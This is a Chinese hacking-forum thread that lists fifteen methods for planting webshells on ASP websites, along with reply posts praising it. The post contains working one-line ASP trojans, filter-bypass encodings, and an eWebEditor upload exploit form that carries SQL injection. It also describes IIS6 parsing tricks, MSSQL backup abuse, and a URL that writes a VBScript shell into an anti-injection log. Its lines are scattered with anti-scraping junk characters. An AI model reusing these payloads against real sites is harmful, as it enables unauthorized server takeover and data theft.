返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式
4 M" [+ I) Z1 r0 @6 S$ e* A
, G5 V; d2 ^4 l. |2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp7 M6 i2 ^0 b6 Y  y: c

4 N( a5 M9 T& N3 y+ g- L; q3.上传漏洞:$ p  q3 v. k1 F3 m1 ^0 f

/ v$ ^6 p; W$ {! M7 C动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00
$ X; v% V- q/ u3 _7 E! o+ Y# Z  e& d. |, l6 A$ F) i3 k5 U
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件( D- |' T6 i9 o* W4 P# ]

- s: N/ a! J) o1 ^+ M雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp1 n8 B$ E/ w) e5 C4 l
然后在上传文件里面填要传的图片格式的ASP木马- ^: J' G8 {% _/ Z; a! t6 a
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
2 r% U: o& n8 b4 h$ Q) m. D4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传7 y1 d( l# @4 C
& A4 f: a* K* |" K: k
<html>
" i" k3 M9 T: \9 n2 X. }; E5 K8 F<head>9 x# A* j6 f, E- V
<title>ewebeditor upload.asp上传利用</title>
5 D  F) n% f$ `7 h7 c0 N</head>0 ^; @9 v( t6 P7 h+ E8 @: @5 x, G7 ?
<body>% f' ]; a0 X( A) U- I6 T
<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">9 p9 q  v2 }7 j! w9 n( {- C
<input type=file name=uploadfile size=100><br><br>
, d: D( e4 a7 o4 {1 |$ B9 Z! e<input type=submit value=Fuck>
1 m% v) m3 ?3 z% D</form>, ~; _, q4 E0 K  j8 i. h
</body>
& a& F* D' @9 Y# p  t, b</form>8 S/ k8 D  y- @+ R. k$ Q
</html>
2 l$ d+ ?& p  F& t& E) {
' c! V* @3 v0 p( ~' U2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问
4 f4 K: o0 H. C5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp- u- q: t& c4 u6 k* M

7 g  ?1 H2 E' i& T+ _$ ?: _利用windows2003解析。建立zjq.asp的文件夹
2 D, K5 B8 E) N5 I0 h* v) q
. r3 l0 B2 M* P' m/ F0 \6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型
: z( p' u. g+ J5 r* Z
- _8 i& M, a+ L, O8 P9 Q6 _7.cuteeditor:类似ewebeditor" O: C3 A( @) ~5 t* F7 Q; }" d
4 }3 V2 @% j4 Y' j8 {3 O, c+ j
8.htmleditor:同上
% R/ |0 M& k1 t: R, ^3 K
& U/ o- R1 y0 {! K0 Q) M) m9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破. n8 h) l4 }2 ?* h" z
+ I0 e8 |- Z7 ~- t% S; g
<%execute request("value")%><%'<% loop <%:%>0 ]2 f" N: `. T6 K2 W

6 z1 `, q: k+ b" I1 K<%'<% loop <%:%><%execute request("value")%>  O, y# y- b5 Q" I
1 ?3 [; Z$ D. y8 u  j, K9 H/ i
<%execute request("value")'<% loop <%:%>
. B$ {! b' y& c; ]7 t9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞" A8 c! L. `( l' `
  `9 E  D! K2 H# m8 W! A
10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
% T# s7 Q- o* `. n/ L& i' C1 q9 v6 k- x- }. g. n) R% G. p/ B' `
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
6 v4 f- ?- `. t* {2 z7 N! v: s
2 ^1 ]) u. ~+ z9 l2 b% w3 b; k( o解析漏洞得到webshell
/ @9 R* y7 U# o) g7 u+ A2 `- z8 Z! D9 s1 a
12.mssql差异备份,日志备份,前提需知道web路径# B2 v7 _0 Q& {7 ~$ o( c0 E& q$ Q
' }9 b% t: ^8 M  u% U
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
3 c' ^/ w' z( ^) O. b6 P7 d
% G; J: `& T  t2 g14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
- V. D$ O2 {2 @$ v& U. z6 r+ j' S6 Y' X' O( E
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可( ~. @3 B, n' t, F) a6 B

9 }0 Y6 T7 J" h& f, ?以上只是本人的一些拙见,并不完善,以后想到了再继续添加8 b$ w. I: {% ~- p
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
# {: P6 |8 N1 [6 j5 J# V: N* S0 Q# j" F3 S5 h

5 F! t$ ^" Y5 b! u0 b很好啊、基本的入侵方法都包含了0 E. M" l, z1 f- u5 e& Q
* s% p" M5 A% e5 T4 i8 J
最好来个提权的帖子再。
( y7 `  H; q5 w* j
* \! q" T; A) ^8 I. a不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表